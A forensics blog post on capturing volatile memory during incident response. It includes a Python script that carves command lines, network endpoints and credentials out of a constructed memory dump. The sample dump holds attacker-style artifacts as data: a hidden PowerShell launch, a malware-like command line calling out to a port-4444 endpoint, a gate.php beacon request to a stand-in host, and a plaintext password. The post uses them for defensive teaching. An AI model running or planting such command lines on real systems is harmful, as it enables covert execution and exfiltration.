May 09, 2013 - Posted by Jeremy Scott
Memory is the new vogue, and rightfully so. My Solutionary teammate, Susan Carter, recently posted a related blog. Coincidentally, we were both crafting our posts at about the same time, but I want to drive home the importance of capturing volatile data and performing memory analysis.
In the past, forensic examinations of computer systems always began by immediately taking any compromised or infected host offline with a "hard shutdown", what has become known as "pulling the plug", and then acquiring a forensic image of the hard drive. The rationale for doing this as the first step was to preserve the state of the hard disk.
Now, the first step in any incident response scenario should be capturing the volatile data at the onset. This has become critical to identifying the extent of the compromise or infection. In fact, in some cases, volatile memory analysis is the only way to identify the nature and extent of a compromise, because the contents of RAM are lost the moment the computer is shut down, and the traces of malicious code, the commands it was given, and the data it exfiltrated may never have been written to disk at all.
I’m not going to go into detail about how volatile memory operates, but I do want to explain why it is important to acquire volatile memory as the first step, rather than following the “pulling the plug” technique of the past.
Memory analysis contributes significantly to any forensic examination, not just a malware infection. It overcomes several limitations of traditional forensic analysis, especially when encryption is involved: a full-disk or container-encrypted volume is opaque in a disk image, while the keys and the decrypted content sit in RAM. Most importantly, it overcomes the inability of a physical disk image to reveal anything about the processes that were running at the time of the compromise.
Some of the information that can be obtained from memory analysis includes:
- Loaded DLLs
- Open files and registry handles
- Network information
- Passwords and cryptographic keys
- Unencrypted content
- Hidden data and files
- Malicious code
- Command line arguments
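As an added illustration of several items in that list (command lines, network information, unencrypted content, credentials), the script below carves them out of a raw memory image by scanning for printable strings. This is example code written for this post, not code from the original article and not Volatility; `MEMORY_IMAGE`, `triage` and the other names are this example's own, and the dump bytes are constructed (documentation IP ranges, no real system). The one thing it shows that a plain `strings` pass does not is the Windows UTF-16LE caveat: process command lines are stored with a NUL byte after every character, so an ASCII-only scan walks straight past them.

```python
"""Carving volatile-memory artifacts out of a raw memory image.

Added example for this post; it is not code from the original article and
not Volatility.  It does the simplest thing a memory image allows: walk the
raw bytes for printable strings (ASCII and Windows-style UTF-16LE) and pull
out command lines, network endpoints and credentials.  MEMORY_IMAGE is a
constructed stand-in for a real dump.
"""
import re
from typing import Dict, List

# Constructed sample "dump": a few artifacts padded with NUL bytes.  Addresses
# use documentation ranges; none of this came from a real system.
MEMORY_IMAGE = (
    b"\x00" * 16
    # ASCII command line, as a console buffer or a log line would hold it
    + b"cmd.exe /c powershell -nop -w hidden -f C:\\Temp\\update.ps1"
    + b"\x00" * 8
    # Windows keeps process command lines as UTF-16LE: every ASCII character
    # is followed by a NUL byte, so a plain ASCII scan never sees this one
    + ("C:\\Users\\victim\\AppData\\Local\\Temp\\svchost32.exe"
       " -connect 203.0.113.45:4444").encode("utf-16-le")
    + b"\x00" * 8
    # HTTP request still sitting in a socket buffer
    + b"GET /gate.php?id=1337 HTTP/1.1\r\nHost: evil.example.net\r\n"
    + b"\x00" * 8
    + b"\x01\x02\x03\x04"   # binary noise, below the minimum string length
    + b"Password=Summer2013!"
    + b"\x00" * 16
)

MIN_LEN = 6  # shorter runs are mostly noise; strings(1) uses 4 by default


def ascii_strings(image: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Runs of printable ASCII, what `strings -a` would report."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, image)]


def utf16le_strings(image: bytes, min_len: int = MIN_LEN) -> List[str]:
    """Printable ASCII interleaved with NUL bytes, what `strings -el` reports."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_len
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, image)]


# Artifact patterns.  Deliberately loose: memory triage is about finding leads
# quickly, then confirming them with a parser that understands the structures.
CMDLINE = re.compile(r"\S+\.exe\b[^\r\n]*", re.I)
IPV4_ENDPOINT = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")
HOST_HEADER = re.compile(r"^Host:\s*(\S+)", re.M)
CREDENTIAL = re.compile(r"\b(?:password|passwd|pwd)\s*=\s*(\S+)", re.I)


def triage(image: bytes) -> Dict[str, List[str]]:
    """Scan both encodings and bucket what turns up by artifact type."""
    found = ascii_strings(image) + utf16le_strings(image)
    report: Dict[str, List[str]] = {
        "strings": found,
        "command_lines": [],
        "network": [],
        "credentials": [],
    }
    for s in found:
        report["command_lines"] += CMDLINE.findall(s)
        report["network"] += IPV4_ENDPOINT.findall(s)
        report["network"] += HOST_HEADER.findall(s)
        report["credentials"] += CREDENTIAL.findall(s)
    return report


if __name__ == "__main__":
    for bucket, items in triage(MEMORY_IMAGE).items():
        print(bucket)
        for item in items:
            print("   ", item)
```

Run against the constructed image, `ascii_strings` returns the cmd.exe line, the HTTP request and the password, and only `utf16le_strings` surfaces the svchost32.exe command line with its 203.0.113.45:4444 endpoint; `triage` then files each hit under command lines, network or credentials. Pattern hunting like this is a first pass over a dump; the structured view (which process owned that command line, which socket that address belongs to) is what Volatility plugins such as pslist and netscan reconstruct from the kernel's own data structures.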
Volatile memory can hold a great deal of information, but the problem is finding a tool that can properly parse the data contained in the memory image. There are a few tools out there, but my favorite, and the one I have used, is Volatility.
Check out a previous post, Hunting Malware with Memory Analysis, for more information on the use of Volatility.
And, pull the network plug, not the power plug…